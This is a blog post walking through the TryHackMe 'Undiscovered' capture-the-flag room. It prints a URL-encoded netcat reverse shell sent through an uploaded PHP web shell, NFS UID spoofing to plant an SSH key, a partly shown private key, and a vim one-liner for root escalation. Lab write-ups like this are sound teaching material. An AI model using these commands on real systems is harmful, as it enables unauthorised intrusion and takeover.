---
layout: post
title:  "THM: Undiscovered"
date:   2020-11-02 21:00:00 +1100
category: hacking
---

## Introduction
*Discovery consists not in seeking new landscapes, but in having new eyes.*

This is [Undiscovered](https://tryhackme.com/room/undiscoveredup) from TryHackMe. Interestingly, this actually was a Vulnhub machine for a while then got moved to THM. I found the foothold and figured out the privesc, but didn't know how to do the lateral movement (from *www-data* to *william*), so that's mostly what I'm going to write about here.

## Subs
This box has a heap of different sub-domains that I enumerated with WFUZZ. It's running RiteCMS 2.2.1 which has an authenticated RCE in the form of an upload vulnerability. The default credentials are *admin:admin* but the password had been changed to *liverpool*; I found that with Burp Turbo Intruder. The initial stage was wading through the subdomains trying to find the right one (*deliver*). The others were all lacking the */cms* directory, which contains the login page.

I uploaded a file called *execute.php* using the File Manager in the Administration tools then sent it a URL encoded reverse shell:

``
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f
``

This was sent to http://deliver.undiscovered.thm/files/execute.php?cmd=

## NFS
So once I was on the box I could see I had two users; *leonard* and *william*. I figured out that the privesc was going to be using **vim**, since it has the setuid capability set. The only thing was that the binary belonged to the Developer group, of which *leonard* was the only member. So we had to become leonard. As it turns out, that is via *william*. Here's how.

The box has an NFS share; I'd mounted it previously but couldn't really do anything with it - not even read the content. As it happens, you need to have a local user with the same *username* and *uid* as the remote user.

We can do that on our local box:

``
root@kali:/opt/tryhackme/undiscovered# useradd -u 3003 william
``

Then mount the share:

``
root@kali:/opt/tryhackme/undiscovered# mount -t nfs undiscovered.thm:/ ./mount
``

And then

``
root@kali:/opt/tryhackme/undiscovered# su - william
``

And once we've done that we can read *and write* to the share. Any changes to our local mounted share are reflected on the box.

The easiest thing to do is to add our SSH public key to the *authorized_keys* for *william*. That doesn't exist; but we can create it.

{% highlight shell %}
root@kali:/opt/tryhackme/undiscovered# mount -t nfs undiscovered.thm:/ mount
root@kali:/opt/tryhackme/undiscovered# su - william
$ cd /opt/tryhackme/undiscovered/mount/home/william
$ mkdir .ssh
$ cd .ssh
$ echo "ssh-rsa AAAAB3NzaC1yc2 AND THE REST OF MY SSH PUBLIC KEY 4IXNhvDE0= root@kali" >> authorized_keys
{% endhighlight %}

Once this is done we can just do:

{% highlight shell %}
root@kali:/opt/tryhackme/undiscovered# ssh william@undiscovered.thm
Warning: Permanently added the ECDSA host key for IP address '10.10.254.175' to the list of known hosts.
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-189-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


0 packages can be updated.
0 updates are security updates.


Last login: Thu Sep 10 00:35:09 2020 from 192.168.0.147
william@undiscovered:~$ 
{% endhighlight %}

## Leonard
William has a file in his home directory that reads files from *leonard*s home directory; so we can read *leonard*s SSH private key. It's not encrypted, so we can just read it, copy it and SSH in as *leonard*. Easy.

{% highlight shell %}
william@undiscovered:~$ ./script .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAwErxDUHfYLbJ6rU+r4oXKdIYzPacNjjZlKwQqK1I4JE93rJQ
HEhQlurt1Zd22HX2zBDqkKfvxSxLthhhArNLkm0k+VRdcdnXwCiQqUmAmzpse9df
etc etc
{% endhighlight %}

## Privesc
As I figured out while I was still www-data and before checking a write-up on how to become *william*, the privesc is via **vim**.

[GTFOBins](https://gtfobins.github.io/gtfobins/vim/#capabilities) offers a method and although the (at the time of writing) only writeup on the THM page says it doesn't work, it actually does provided you specify python3:

``
leonard@undiscovered:~$ vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
``

So overall I had most of this sorted apart from the trick about having a local user with the same username and UID as the remote user. I hadn't seen that before and it's something I won't forget. TIL.

The writeups I looked at were from [here](https://linkedroot.blogspot.com/2020/10/undiscovered-tryhackme-write-up.html) and [here](https://0xatom.github.io/vulnhub/2020/09/30/undiscovered/).
